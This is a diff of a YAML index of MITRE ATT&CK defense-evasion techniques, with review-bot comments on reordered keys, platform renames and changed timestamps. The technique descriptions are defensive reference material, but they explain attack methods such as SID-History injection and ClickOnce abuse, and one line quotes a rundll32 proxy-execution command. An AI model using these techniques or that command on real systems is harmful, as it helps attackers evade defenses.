+ modified: '2021-02-09T15:49:58.414Z'
name: 'Access Token Manipulation: SID-History Injection'
description: |-
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -10197,8 +10346,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1134.005
atomic_tests: []
T1599:
@@ -10229,7 +10376,7 @@ defense-evasion:
Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021) In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:05:44.200Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Network Boundary Bridging
x_mitre_detection: |-
@@ -10248,7 +10395,6 @@ defense-evasion:
- System Access Controls
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1553:
technique:
@@ -10343,11 +10489,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1548.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T16:35:18.492Z'
name: Elevated Execution with Prompt
description: "Adversaries may leverage the AuthorizationExecuteWithPrivileges
API to escalate privileges by prompting the user for credentials.(Citation:
@@ -10427,11 +10572,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:24:56.148Z'
name: 'Signed Binary Proxy Execution: Regsvr32'
description: |-
Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)
@@ -10496,12 +10640,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.010
atomic_tests: []
T1036.003:
technique:
- modified: '2023-09-14T21:12:48.411Z'
+ modified: '2024-09-12T19:30:45.065Z'
name: 'Masquerading: Rename System Utilities'
description: 'Adversaries may rename legitimate system utilities to try to evade
security mechanisms concerning the usage of those utilities. Security monitoring
@@ -10550,8 +10693,8 @@ defense-evasion:
external_id: T1036.003
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Elastic Masquerade Ball
description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
Retrieved October 31, 2016.'
@@ -10566,14 +10709,13 @@ defense-evasion:
url: https://lolbas-project.github.io/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.003
atomic_tests: []
T1562.011:
technique:
- modified: '2023-04-12T22:46:33.995Z'
+ modified: '2024-10-16T20:12:44.962Z'
name: Spoof Security Alerting
description: |-
Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.
@@ -10585,7 +10727,7 @@ defense-evasion:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -10615,13 +10757,12 @@ defense-evasion:
url: https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -10682,7 +10823,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests: []
T1027.003:
@@ -10738,11 +10878,10 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1550.004:
technique:
- modified: '2023-09-19T21:26:24.725Z'
+ modified: '2024-10-15T16:11:15.657Z'
name: Web Session Cookie
description: |-
Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -10766,11 +10905,10 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Web Credential: Web Credential Usage'
@@ -10795,9 +10933,8 @@ defense-evasion:
url: https://wunderwuzzi23.github.io/blog/passthecookie.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.002:
technique:
@@ -10877,7 +11014,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.009:
technique:
@@ -10911,7 +11047,7 @@ defense-evasion:
- source_name: LOLBAS Regasm
url: https://lolbas-project.github.io/lolbas/Binaries/Regasm/
description: LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:55:48.725Z'
name: 'Signed Binary Proxy Execution: Regsvcs/Regasm'
description: |-
Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
@@ -10938,8 +11074,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.009
atomic_tests: []
T1553.004:
@@ -11034,48 +11168,24 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.004
atomic_tests: []
T1027.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
- type: attack-pattern
- created: '2020-03-16T15:30:57.711Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1027.004
- url: https://attack.mitre.org/techniques/T1027/004
- - description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
- in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
- campaign. Retrieved November 29, 2018.'
- url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
- source_name: ClearSky MuddyWater Nov 2018
- - source_name: TrendMicro WindowsAppMac
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
- description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
- Info Stealer and Adware. Retrieved April 25, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-03T17:43:14.766Z'
name: 'Obfuscated Files or Information: Compile After Delivery'
description: |-
- Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+ Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Praetorian
+ - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
+ - Liran Ravich, CardinalOps
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor the execution file paths and command-line arguments
for common compilers, such as csc.exe and GCC/MinGW, and correlate with other
suspicious behavior to reduce false positives from normal user and administrator
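Review bot: the x_mitre_detection text at the end of this hunk still tells defenders to monitor only csc.exe and GCC/MinGW, while the rewritten description line above now also names ilasm.exe (backed by the new ATTACK IQ citation); the compiler list in the detection guidance should match the compilers the description says are used. Since this is upstream ATT&CK text reproduced by the generator, the fix belongs in the upstream data rather than in a hand edit of this index.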
@@ -11084,9 +11194,14 @@ defense-evasion:
and execution frameworks like Mono and determine if they have a legitimate
purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these
should only be used in specific and limited cases, like for software development.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Creation'
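Review bot: x_mitre_modified_by_ref is removed in this hunk only to be re-added at the end of the same object further down, so most of the diff here is key reordering rather than change; if the generator can emit keys in a stable order, these move-only hunks disappear and the real edits (the version bump from '1.0' to '1.1' and the added x_mitre_domains and x_mitre_platforms lists) become easy to review.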
@@ -11098,12 +11213,35 @@ defense-evasion:
- Anti-virus
- Binary Analysis
- Static File Analysis
- x_mitre_permissions_required:
- - User
x_mitre_system_requirements:
- Compiler software (either native to the system or delivered by the adversary)
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
+ created: '2020-03-16T15:30:57.711Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1027/004
+ external_id: T1027.004
+ - source_name: ClearSky MuddyWater Nov 2018
+ description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
+ in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
+ campaign. Retrieved November 29, 2018.'
+ url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
+ - source_name: ATTACK IQ
+ description: 'Federico Quattrin, Nick Desler, Tin Tam, & Matthew Rutkoske.
+ (2023, March 16). Hiding in Plain Sight: Monitoring and Testing for Living-Off-the-Land
+ Binaries. Retrieved July 15, 2024.'
+ url: https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/
+ - source_name: TrendMicro WindowsAppMac
+ description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
+ Info Stealer and Adware. Retrieved April 25, 2019.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1027.004
atomic_tests: []
T1564.007:
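Review bot: spec_version: '2.1' is dropped here without replacement, and the same removal is repeated for every object in this patch, so any consumer that reads the STIX spec_version from this index should be checked before merge; x_mitre_permissions_required is dropped as well, while x_mitre_attack_spec_version moves from 2.1.0 to 3.2.0 and revoked: false is added. The new reference block is otherwise consistent with the description: the ATTACK IQ entry added here is the one the new (Citation: ATTACK IQ) in the description refers to.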
@@ -11151,7 +11289,7 @@ defense-evasion:
url: https://github.com/decalage2/oletools
description: decalage2. (2019, December 3). python-oletools. Retrieved September
18, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T14:02:07.944Z'
name: VBA Stomping
description: |-
Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
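Review bot: modified moves backwards in this hunk (2022-04-25 to 2021-10-15), and the same happens later for T1197, T1055.009, T1601.001 and T1070.009; given that the other objects move forward to 2024 dates, the previous index most likely carried synthetic timestamps rather than this being a regression, but it is worth confirming the generator reads the current upstream bundle so the dates are not silently rolled back.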
@@ -11177,12 +11315,10 @@ defense-evasion:
x_mitre_system_requirements:
- MS Office version specified in _VBA_PROJECT
stream must match
host
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1197:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:21:40.927Z'
name: BITS Jobs
description: |-
Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
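Review bot: unlike T1027.004 above, the removed x_mitre_attack_spec_version: 2.1.0 for T1564.007 at the top of this hunk has no replacement within the hunk; verify the object still carries the field elsewhere, otherwise VBA Stomping ends up with no attack spec version at all.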
@@ -11272,7 +11408,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1197
atomic_tests: []
T1127.001:
@@ -11330,12 +11465,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1127.001
atomic_tests: []
T1656:
technique:
- modified: '2023-09-30T19:45:05.886Z'
+ modified: '2024-10-15T15:59:06.382Z'
name: Impersonation
description: "Adversaries may impersonate a trusted person or organization in
order to persuade and trick a target into performing some action on their
@@ -11377,10 +11511,9 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
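Review bot: replacing the Office 365 and Google Workspace platforms with the single Office Suite platform in this hunk changes what any per-platform filter over this index returns; a consumer that selects techniques by the old platform names will stop seeing T1656 until it is updated to the new vocabulary, and the same rename recurs below for T1562.008 and T1556.009, so the change should be called out in the commit message.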
@@ -11404,18 +11537,30 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1578.005:
technique:
- modified: '2023-10-02T22:17:54.968Z'
+ modified: '2024-09-25T14:15:26.322Z'
name: Modify Cloud Compute Configurations
- description: |-
- Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.
-
- For example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)
-
- Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.(Citation: Microsoft Peach Sandstorm 2023) This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Azure Policy) (Citation: Microsoft Subscription Hijacking 2022)
+ description: "Adversaries may modify settings that directly affect the size,
+ locations, and resources available to cloud compute infrastructure in order
+ to evade defenses. These settings may include service quotas, subscription
+ associations, tenant-wide policies, or other configurations that impact available
+ compute. Such modifications may allow adversaries to abuse the victim’s compute
+ resources to achieve their goals, potentially without affecting the execution
+ of running instances and/or revealing their activities to the victim.\n\nFor
+ example, cloud providers often limit customer usage of compute resources via
+ quotas. Customers may request adjustments to these quotas to support increased
+ computing needs, though these adjustments may require approval from the cloud
+ provider. Adversaries who compromise a cloud environment may similarly request
+ quota adjustments in order to support their activities, such as enabling additional
+ [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising
+ suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking
+ 2023) Adversaries may also increase allowed resource usage by modifying any
+ tenant-wide policies that limit the sizes of deployed virtual machines.(Citation:
+ Microsoft Azure Policy)\n\nAdversaries may also modify settings that affect
+ where cloud resources can be deployed, such as enabling [Unused/Unsupported
+ Cloud Regions](https://attack.mitre.org/techniques/T1535). "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
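Review bot: the rewritten description switches from the |- block scalar to a double-quoted folded string, which turns the paragraph breaks into \n\n escapes and leaves a trailing space before the closing quote (Cloud Regions](...). "); keeping the block scalar would avoid the stray whitespace and keep future diffs readable. The content change itself is coherent: the Azure subscription-hijacking paragraph is removed, the two references that only supported it (Microsoft Peach Sandstorm 2023, Microsoft Subscription Hijacking 2022) are deleted further down, and the version bump to '2.0' matches a substantive rewrite.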
@@ -11429,7 +11574,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- x_mitre_version: '1.0'
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
type: attack-pattern
@@ -11441,20 +11586,11 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1578/005
external_id: T1578.005
- - source_name: Microsoft Subscription Hijacking 2022
- description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
- using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
- url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
- source_name: Microsoft Cryptojacking 2023
description: 'Microsoft Threat Intelligence. (2023, July 25). Cryptojacking:
Understanding and defending against cloud compute resource abuse. Retrieved
September 5, 2023.'
url: https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/
- - source_name: Microsoft Peach Sandstorm 2023
- description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
- password spray campaigns enable intelligence collection at high-value targets.
- Retrieved September 18, 2023.
- url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
- source_name: Microsoft Azure Policy
description: Microsoft. (2023, August 30). Azure Policy built-in policy definitions.
Retrieved September 5, 2023.
@@ -11463,11 +11599,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.008:
technique:
- modified: '2024-04-12T21:13:56.431Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Impair Defenses: Disable Cloud Logs'
description: |-
An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
@@ -11476,6 +11611,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -11485,6 +11621,7 @@ defense-evasion:
- Janantha Marasinghe
- Matt Snyder, VMware
- Joe Gumke, U.S. Bank
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor logs for API calls to disable logging. In AWS, monitor
for: StopLogging
and DeleteTrail
.(Citation: Stopping
@@ -11496,13 +11633,13 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- - Office 365
- x_mitre_version: '2.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
- 'User Account: User Account Modification'
@@ -11547,9 +11684,6 @@ defense-evasion:
url: https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.008
atomic_tests:
- name: Office 365 - Exchange Audit Log Disabled
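Review bot: the first atomic test under this technique is still titled "Office 365 - Exchange Audit Log Disabled" while the platform list for T1562.008 now reads IaaS, SaaS, Office Suite, Identity Provider; the test's own supported_platforms is not in this diff, so check that it uses a value that still appears in the technique's platform list, otherwise platform-based index generation will pair a test with a platform the technique no longer declares. The x_mitre_attack_spec_version and x_mitre_modified_by_ref lines removed at the top of this hunk are the same ones inserted near the top of the object in the earlier hunks, so that part is a reorder, not a change.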
@@ -11718,18 +11852,140 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.003
atomic_tests: []
+ T1127.002:
+ technique:
+ modified: '2024-10-17T18:50:41.474Z'
+ name: ClickOnce
+ description: |-
+ Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
+
+ Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
+
+ ClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)
+
+ Adversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)
+
+ Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Wirapong Petshagun
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Command: Command Execution'
+ - 'Process: Process Metadata'
+ - 'Module: Module Load'
+ x_mitre_system_requirements:
+ - ".NET Framework"
+ type: attack-pattern
+ id: attack-pattern--cc279e50-df85-4c8e-be80-6dc2eda8849c
+ created: '2024-09-09T14:39:28.637Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1127/002
+ external_id: T1127.002
+ - source_name: LOLBAS /Dfsvc.exe
+ description: LOLBAS. (n.d.). /Dfsvc.exe. Retrieved September 9, 2024.
+ url: https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/
+ - source_name: Microsoft Learn ClickOnce
+ description: Microsoft. (2023, September 14). ClickOnce security and deployment.
+ Retrieved September 9, 2024.
+ url: https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment?view=vs-2022
+ - source_name: SpectorOps Medium ClickOnce
+ description: 'Nick Powers. (2023, June 7). Less SmartScreen More Caffeine:
+ (Ab)Using ClickOnce for Trusted Code Execution. Retrieved September 9, 2024.'
+ url: https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
+ - source_name: NetSPI ClickOnce
